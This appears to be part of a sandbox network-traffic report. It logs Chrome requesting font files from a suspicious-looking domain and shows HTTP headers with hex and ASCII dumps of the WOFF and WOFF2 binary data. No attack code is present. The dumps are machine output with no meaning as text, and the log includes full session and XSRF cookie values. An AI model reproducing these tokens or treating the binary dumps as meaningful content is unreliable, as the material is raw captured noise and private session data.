laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:21 UTC624INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 28584
                                                        Connection: close
                                                        Content-Disposition: inline; filename="90jodEH2Rir67QW4OuPst51"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=be%2FZ2stWPLTUgGNUXDGChajSFcZv%2B%2B7zHPlZcSpEUTi0B6pRQVpcbbhRtkHGV8dKzE2%2BI39vRtNjKVTuoEvZa7pbD5ScF51RRjEAXzXT95cXZRgMb%2FeObl51gV%2FWYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9286cba2f4294-EWR
                                                        2024-07-03 19:07:21 UTC745INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                        Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 0b 20 00 9e 7f f7 d3 db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2
                                                        Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ X
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 4d be ef 69 9d 44 eb 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a
                                                        Data Ascii: MiD0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 3b c2 fb bf fc 8c 82 bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46
                                                        Data Ascii: ;ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCF
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 0c 09 37 5f 5d ca 6d 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d
                                                        Data Ascii: 7_]m*,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`np
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 2a 13 91 05 2e 44 bf ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06
                                                        Data Ascii: *.D^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=
                                                        2024-07-03 19:07:21 UTC1369INData Raw: b5 46 e9 89 d1 1b ab 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f
                                                        Data Ascii: F{CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=o
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 34 0b 2d ab af a9 57 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d
                                                        Data Ascii: 4-WgQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 9e c9 86 8a fb 19 1b 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc
                                                        Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2
                                                        2024-07-03 19:07:21 UTC79INData Raw: e8 b0 43 69 8b 41 c0 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a
                                                        Data Ascii: CiAT;s2$<bioyUq[ .)E|{9|2O%yK8 O


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.549786104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC1384OUTGET /45JQQXGinJG902EgrDtnvQTvw65 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://rfwai.elixir85.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:21 UTC621INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Content-Type: font/woff
                                                        Content-Length: 36696
                                                        Connection: close
                                                        Content-Disposition: inline; filename="45JQQXGinJG902EgrDtnvQTvw65"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tS2bzZmqDJvar7dceshdf7vhGv3OZGvdIbGsgwabuk7i0t9TtgH3L2yzZ41ZL5znNjdae%2Bd5mUJ7u%2FHNjN%2FnTCJpNeOWnCNtiiH5zlPvSHufKmnDySWPJgsi6zfunA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9286cbaae42eb-EWR
                                                        2024-07-03 19:07:21 UTC748INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                        Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 9f 20 67 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7 28 a8 c6 93 4f
                                                        Data Ascii: g*Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj(O
                                                        2024-07-03 19:07:21 UTC1369INData Raw: a9 00 2d 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae e7 1a 5c eb d4
                                                        Data Ascii: -:Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f\
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 4d 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5 9d 99 42 1f ab
                                                        Data Ascii: MVd>#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSuB
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 89 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6 77 95 44 d1 53
                                                        Data Ascii: m{1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#wDS
                                                        2024-07-03 19:07:21 UTC1369INData Raw: a5 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce 36 d7 f9 22 1f
                                                        Data Ascii: xp\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(PHsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g6"
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 9c 63 21 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8
                                                        Data Ascii: c!9!n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uI
